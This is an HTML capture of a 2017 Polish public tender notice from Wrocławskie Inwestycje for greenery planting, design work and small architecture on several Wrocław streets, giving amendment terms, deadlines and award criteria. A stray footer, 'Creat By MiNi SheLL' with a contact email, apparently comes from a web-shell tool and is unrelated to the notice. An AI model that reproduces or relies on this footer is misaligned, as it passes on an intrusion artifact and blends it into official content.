skutki spowodowane przez substancje toksyczne, z wyjątkiem tych, któremogą być przypisane użyciu przez Wykonawcę takich substancji, e) działania sił przyrody, huragany,powodzie, f) ogólnokrajowe bądź regionalne spory w przemyśle lub też spory, które są częściąogólnonarodowej lub regionalnej kampanii, a którym Strona nie mogła zapobiec. 11) Zmianyustawowej zmiany opodatkowania podatkiem VAT, przy czym zmiana ta być powiązania z obniżeniemlub podwyższeniem wynagrodzenia, odpowiednio do jego procentowego podwyższenia lub jegoprocentowego obniżenia. Zmiany mogą zostać dokonane ze skutkiem nie wcześniej niż na dzieńwejścia w życie przepisów, z których wynikają w/w zmiany. 12) W przypadku zmiany: a) wysokościminimalnego wynagrodzenia za pracę albo wysokości minimalnej stawki godzinowej ustalonego napodstawie przepisów ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę, b)zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawkiskładki na ubezpieczenia społeczne lub zdrowotne - jeżeli zmiany te będą miały wpływ na kosztywykonania zamówienia przez Wykonawcę. Zmiany mogą zostać dokonane ze skutkiem nie wcześniejniż na dzień wejścia w życie przepisów, z których wynikają w/w zmiany. Wykonawca obowiązany jestprzedłożyć Zamawiającemu na piśmie szczegółową analizę porównawczą kosztów stanowiącą wykazponiesionych wydatków w związku ze zmianą ww. przepisów z powołaniem się na stosowne przepisy,z których wynikają w/w zmiany, a także przedłożyć konieczne dokumenty (w tym oświadczenia dlacelów podatkowych i ZUS) Wykonawcy. Dla wyceny robót zamiennych wprowadzonych zgodnie zzapisami powyżej przyjmuje się następujące zasady: Odpowiednia stawka lub cena dla każdej pozycjirobót winna być taka, jaka została zatwierdzona w umowie dla tej pozycji lub, jeśli takiej nie ma, toustalona dla podobnej roboty. Dla pozycji robót będzie jednak ustalana nowa stawka lub cena, jeśliłącznie są spełnione: a) dla danej pozycji nie jest w umowie przewidziana żadna stawka ani cena, orazb) żadna stawka ani cena nie są odpowiednie, gdyż dana praca nie ma podobnego charakteru, albo niejest wykonywana w warunkach podobnych do żadnej innej w umowie. Jeżeli dla wyprowadzenianowej stawki lub ceny brak jest podstaw w umowie, to należy ją wyliczyć na mocy uzasadnionegokosztu wykonania takiej roboty wraz z rozsądnym zyskiem, biorąc pod uwagę wszystkie okolicznościtowarzyszące. W takim przypadku koszt zostanie ustalony na podstawie normatywów określonych wKatalogach Nakładów Rzeczowych (KNR) przy użyciu co najwyżej średnich, dla rejonu DolnegoŚląska cen materiałów, urządzeń, pracy sprzętu budowlanego, stawek robocizny kosztorysowej orazinnych wskaźników cenotwórczych, określonych w informacjach - ,,SEKOCENBUD", wydawanychprzez Ośrodek Wdrożeń Ekonomiczno - Organizacyjnych Budownictwa Promocja Sp. z o.o. W celuustalenia kosztu Wykonawca przedłoży Inżynierowi kosztorys takich robót sporządzony zuwzględnieniem powyższych zasad. Przewidziane zmiany do umowy mogą być powiązane zobniżeniem wynagrodzenia umownego. 3. Wszystkie powyższe postanowienia stanowią katalogzmian, na które Zamawiający może wyrazić zgodę, jednak nie stanowią jednocześnie zobowiązania dowyrażenia takiej zgody. Warunkiem dokonania zmian postanowień zawartej jest podpisanie aneksu doumowy i zgoda obu stron wyrażona na piśmie, pod rygorem nieważności zmian. 4. Nie wymagajązmiany umowy zmiany dotyczące m. in.: imion i nazwisk osób uprawnionych do reprezentacji orazodpowiedzialnych za realizację przedmiotu umowy, zmian stawki podatku od towarów i usług VATlub innych określonych w ust. 2 pkt 1 wzoru umowy.</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2017-07-17</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">11:30</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu"></span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">polski</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Tak</span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5"></span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6">1. Wykonawca może w celu potwierdzenia spełniania warunków, o których mowa w pkt. III.3)ogłoszenia w stosownych sytuacjach polegać na zdolnościach technicznych lub zawodowych lubsytuacji finansowej innych podmiotów, niezależnie od charakteru prawnego łączących go z nimstosunków prawnych. 1.1. Zamawiający informuje, iż ,,stosowna sytuacja", o której mowa powyżejwystąpi w przypadku kiedy zajdą w szczególności nw. okoliczności: 1.2. Wykonawca, który polega nazdolnościach lub sytuacji innych podmiotów udowodni Zamawiającemu, że realizując zamówieniebędzie dysponował niezbędnymi zasobami tych podmiotów w szczególności przedstawiając wraz zofertą zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzebyrealizacji zamówienia. 1.3. Jeżeli Wykonawca, wykazując spełnianie warunków, o których mowa wart. 22 ust. 1 pkt 2) ustawy pzp, polega na wiedzy i doświadczeniu, potencjale technicznym, osobachzdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów na zasadachokreślonych w art. 22 a ust. 1 ustawy, Zamawiający, w celu oceny czy Wykonawca będzie dysponowałniezbędnymi zasobami w stopniu umożliwiającym należyte wykonanie zamówienia publicznego orazoceny, czy stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ichzasobów, żąda przedłożenia wraz z ofertą dokumentów, które określają w szczególności: a) zakresudostępnych wykonawcy zasobów innego podmiotu, b) sposobu wykorzystania zasobów innegopodmiotu przez wykonawcę przy wykonywaniu zamówienia publicznego, c) zakresu i okresu udziałuinnego podmiotu przy wykonywaniu zamówienia publicznego d) czy podmioty na zdolności którychWykonawca polega w odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia,kwalifikacji zawodowych lub doświadczenia zrealizują usługi, których wskazane zdolności dotyczą.1.4. Zamawiający publikuje pomocniczo wzór zobowiązania podmiotu trzeciego do oddania dodyspozycji zasobów w trakcie realizacji zamówienia (załącznik nr 9 do IDW). 1.5. Zamawiającyoceni, czy udostępniane Wykonawcy przez inne podmioty zdolności techniczne lub zawodowepozwalają na wykazanie przez Wykonawcę spełniania warunków udziału w postępowaniu oraz zbadaczy nie zachodzą wobec tego podmiotu przesłanki wykluczenia, o których mowa w art. 24 ust. 1 pkt13-22 oraz ust. 5 pkt 1) ustawy pzp, Zamawiający działając na podstawie art. 26 ust. 2 ustawy pzp wzwiązku z § 9 ust. 2 rozporządzenia w sprawie dokumentów wezwie Wykonawcę, który polega nazdolnościach lub sytuacji innych podmiotów na zasadach określonych w art. 22a ustawy pzp doprzedstawienia w odniesieniu do tych podmiotów dokumentów, o których mowa w pkt. III.4)ogłoszenia. 2. Oświadczenie stanowiące wstępne potwierdzenie, że Wykonawca spełnia warunkiudziału w postępowaniu, o których mowa w pkt. III.3 ogłoszenia powinny zostać sporządzone iwypełnione zgodnie z załącznikiem nr 2 do IDW oraz oświadczenie stanowiące wstępnepotwierdzenie, że Wykonawca nie podlega wykluczeniu z udziału w postępowaniu, powinny zostaćsporządzone i wypełnione zgodnie z załącznikiem nr 3 do IDW.. W związku z tym, że Zamawiającyzgodnie z art. 22a ust. 3 ustawy PZP ocenia, czy udostępniane Wykonawcy na podstawie art. 22a ust. 1i 2 ustawy PZP przez inne podmioty zdolności techniczne lub zawodowe pozwalają na wykazanieprzez Wykonawcę spełniania warunków udziału w postępowaniu oraz bada, czy nie zachodzą wobectych podmiotów podstawy wykluczenia, o których mowa w art. 24 ust. 1 pkt 13-22 i ust. 5 pkt 1ustawy PZP, Wykonawca, który bierze udział w postępowaniu i polega na zdolności innychpodmiotów w celu wykazania braku istnienia wobec nich podstaw wykluczenia oraz spełniania wzakresie w jakim powołuje się na ich zasoby warunków udziału w postępowaniu zamieszczainformacje o tych podmiotach w Oświadczeniach sporządzonych zgodnie z Załącznikiem nr 3 doIDW. Zamawiający nie wymaga wypełniania przez Wykonawców Oświadczeń w odniesieniu dopodwykonawców, na których zdolnościach Wykonawca NIE polega. W przypadku wspólnegoubiegania się o zamówienie przez Wykonawców Oświadczenia, o których mowa w powyżej składakażdy z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia te mają potwierdzaćspełnianie warunków udziału w postępowaniu w zakresie, w którym każdy z wykonawców wykazujespełnianie warunków udziału w postępowaniu oraz brak podstaw do wykluczenia w odniesieniu dokażdego z Wykonawców wspólnie ubiegających się o udzielenie zamówienia. W celu potwierdzeniabraku podstaw do wykluczenia Wykonawcy z postępowania, o których mowa w art. 24 ust. 1 pkt. 23)Wykonawca w terminie 3 dni od dnia zamieszczenia na stronie internetowej Zamawiającego(www.wi.wroc.pl) informacji, o której mowa w art. 86 ust. 5 ustawy pzp, przekaże Zamawiającemuoświadczenie o przynależności albo braku przynależności do tej samej grupy kapitałowej, o którejmowa w art. 24 ust. 1 pkt 23) ustawy pzp; w przypadku przynależności do tej samej grupy kapitałowejWykonawca może złożyć wraz z oświadczeniem dokumenty bądź informacje potwierdzające, żepowiązania z innym Wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu. Otwarcieofert nastąpi w siedzibie Wrocławskich Inwestycji Sp. z o.o., ul. Ofiar Oświęcimskich 36 weWrocławiu 50-059, Sala konferencyjna, piętro 5.w dniu 17.07.2017 r. o godz.12:00</span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> <table><tr><td><b>Część nr: </b></td><td>1</td><td><b>Nazwa: </b></td><td>Zadanie 1 dokumentacja projektowa, nasadzenia oraz elementy małej architektury przy ul. Konduktorskiej we Wrocławiu</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przedmiotemzamówienia w zakresie Części 1 Zadanie 1: dokumentacja projektowa, nasadzenia oraz elementy małejarchitektury przy ul. Konduktorskiej we Wrocławiu w ramach nasadzeń wyrównujących za wycinkęzieleni na zadaniu: 03170 ,,Przebudowa ul. Buforowej w ciągu drogi wojewódzkiej nr 395 we Wrocławiu- etap I" jest: wykonanie dokumentacji projektowej, uzyskanie wymaganych uzgodnień, wykonanienasadzeń i elementów małej architektury oraz prowadzenie pielęgnacji nasadzonej zieleni w 3 letnimokresie. Dokumentacja projektowa powinna zostać opracowana na podstawie ,,KoncepcjiZagospodarowania Terenu wzdłuż ul. Konduktorskiej we Wrocławiu" z uwzględnieniem projektu iwykonanych robót w ramach zadania ,,Rozbudowa ul. Konduktorskiej wraz z budową ciągu pieszorowerowego"oraz w zakresie linii rozgraniczających tego projektu a także z uwzględnieniem zapisówOpisu Przedmiotu Zamówienia. Wszelkie roboty powinny być prowadzone przy zapewnieniu nadzoruogrodniczego.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>77211600-8, 74222000-1, 77312100-1, 74250000-6, 77211500-7, 39150000-8, 77310000-6<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: 0,0<br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2020-11-03<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Doświadczenie ogrodnika wyznaczonego do uczestniczenia w realizacji zamówienia (DO)</td><td style="border: 1px solid black;border-collapse: collapse;">20,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Doświadczenie projektanta zieleni wyznaczonego do uczestniczenia w realizacji zamówienia (DP)</td><td style="border: 1px solid black;border-collapse: collapse;">20,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>2</td><td><b>Nazwa: </b></td><td>Zadanie 2 dokumentacja projektowa i nasadzenia wzdłuż ciągu pieszo-rowerowego od ul. Konduktorskiej do ul. Buforowej bocznej</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przedmiotzamówienia w zakresie Części 2 Zadanie 2: dokumentacja projektowa, nasadzenia wzdłuż ciągu pieszorowerowegood ul. Konduktorskiej do ul. Buforowej bocznej w ramach nasadzeń wyrównujących zawycinkę zieleni na zadaniu: 03170 ,,Przebudowa ul. Buforowej w ciągu drogi wojewódzkiej nr 395 weWrocławiu - etap I" jest: wykonanie dokumentacji projektowej, uzyskanie wymaganych uzgodnień,wykonanie nasadzeń oraz prowadzenie pielęgnacji nasadzonej zieleni w 3 letnim okresie. Dokumentacjaprojektowa powinna zostać opracowana zgodnie z programem funkcjonalno-użytkowym będącymelementem OPZ. Wszelkie roboty powinny być prowadzone przy zapewnieniu nadzoru ogrodniczego.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>77211600-8, 74222000-1, 74250000-6, 77312100-1, 77211500-7, 77310000-6<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: 0,0<br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2020-11-03<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Doświadczenie ogrodnika wyznaczonego do uczestniczenia w realizacji zamówienia (DO)</td><td style="border: 1px solid black;border-collapse: collapse;">20,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Doświadczenie projektanta zieleni wyznaczonego do uczestniczenia w realizacji zamówienia (DP)</td><td style="border: 1px solid black;border-collapse: collapse;">20,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>3</td><td><b>Nazwa: </b></td><td>Zadanie 3 nasadzenia przy ul. Bardzkiej we Wrocławiu</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przedmiotemzamówienia w zakresie Części 3 Zadanie 3: nasadzenia przy ul. Bardzkiej we Wrocławiu w ramachnasadzeń wyrównujących za wycinkę zieleni na zadaniu: 03170 ,,Przebudowa ul. Buforowej w ciągudrogi wojewódzkiej nr 395 we Wrocławiu - etap I" jest: wykonanie nasadzeń zieleni zgodnie z projektem,,Zagospodarowania zielenią niską i wysoką wzdłuż ul. Bardzkiej, na odcinku od ul. Hubskiej do ul.Świeradowskiej we Wrocławiu" - etap 2 i 3 (z wyłączeniem drzew oznaczonych w etapie 3 jako,,wymagające uzyskania odstępstwa") oraz prowadzenie pielęgnacji nasadzonej zieleni w 3 letnimokresie. Wszelkie roboty powinny być prowadzone przy zapewnieniu nadzoru ogrodniczego.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>77312100-1, 77211500-7, 77310000-6<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: 0,0<br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2020-11-03<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Doświadczenie ogrodnika wyznaczonego do uczestniczenia w realizacji zamówienia (DO3)</td><td style="border: 1px solid black;border-collapse: collapse;">20,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Termin zakończenia nasadzeń (T)</td><td style="border: 1px solid black;border-collapse: collapse;">20,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b>Termin wykonania zamówienia - 03.11.2020r. jest terminem maksymalnym, zależnym od terminu zakończenia nasadzeń (zakończonych podpisaniem protokołu odbioru końcowego, o którym mowa w § 5ust. 3 wzoru umowy), który to stanowi kryterium oceny ofert.<br/><br/><br/> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com